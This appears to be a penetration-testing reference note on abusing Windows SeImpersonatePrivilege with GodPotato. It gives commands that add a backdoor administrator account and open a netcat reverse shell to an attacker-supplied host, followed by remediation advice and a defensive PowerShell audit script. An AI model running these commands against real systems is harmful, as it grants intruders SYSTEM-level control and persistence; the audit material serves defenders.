SeImpersonatePrivilege Abuse
Exploit
Example below using GodPotato. SeImpersonatePrivilege can also be leveraged by JuicyPotato, PrintSpoofer, RoguePotato, and SharpEfsPotato.
# Check if SeImpersonatePrivilege is enabled for the current user.
whoami /priv
# Execute command as NT AUTHORITY\SYSTEM.
.\GodPotato.exe -cmd "net user $username $password /add; net localgroup administrators $username /add"
.\GodPotato.exe -cmd "nc.exe $lhost $lport -e cmd"
Recommendations
- Remove SeImpersonatePrivilege (the "Impersonate a client after authentication" user right) from domain and local user accounts.
- Deploy EDR on Windows hosts to detect and block GodPotato-style exploits.
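To audit the first recommendation, the following added PowerShell example (not part of the original note) exports the local user-rights assignment with secedit, resolves every SID that holds SeImpersonatePrivilege, and flags holders outside the Windows default set; it assumes secedit.exe is present and that the script runs from an elevated prompt.

```powershell
# Added audit example: list who holds SeImpersonatePrivilege on this host and
# flag principals that are not in the default set Windows assigns the right to.
$Defaults = @(
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-19',      # NT AUTHORITY\LOCAL SERVICE
    'S-1-5-20',      # NT AUTHORITY\NETWORK SERVICE
    'S-1-5-6'        # NT AUTHORITY\SERVICE
)

function Get-SeImpersonateHolders {
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    try {
        # secedit writes the user-rights assignment recorded in the local
        # security database to an .inf file (requires administrator rights).
        & secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $line = Get-Content -Path $cfg | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
        if (-not $line) { return @() }   # no entry: nobody is assigned the right

        # Line format: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
        $sids = ($line -split '=', 2)[1].Trim() -split ',' |
                ForEach-Object { $_.Trim().TrimStart('*') }
        foreach ($sid in $sids) {
            try {
                $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate(
                            [System.Security.Principal.NTAccount]).Value
            } catch {
                $name = '<unresolved>'    # e.g. deleted account or unreachable domain
            }
            [pscustomobject]@{
                Sid       = $sid
                Account   = $name
                IsDefault = ($Defaults -contains $sid)
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

$holders = Get-SeImpersonateHolders
$holders | Format-Table -AutoSize
$extra = $holders | Where-Object { -not $_.IsDefault }
if ($extra) {
    Write-Warning ('Non-default SeImpersonatePrivilege holders: {0}' -f ($extra.Account -join ', '))
}
```

Flagged holders are often legitimate service identities (for example IIS application pool or SQL Server accounts), so verify each one before removing the right through Local Security Policy or Group Policy.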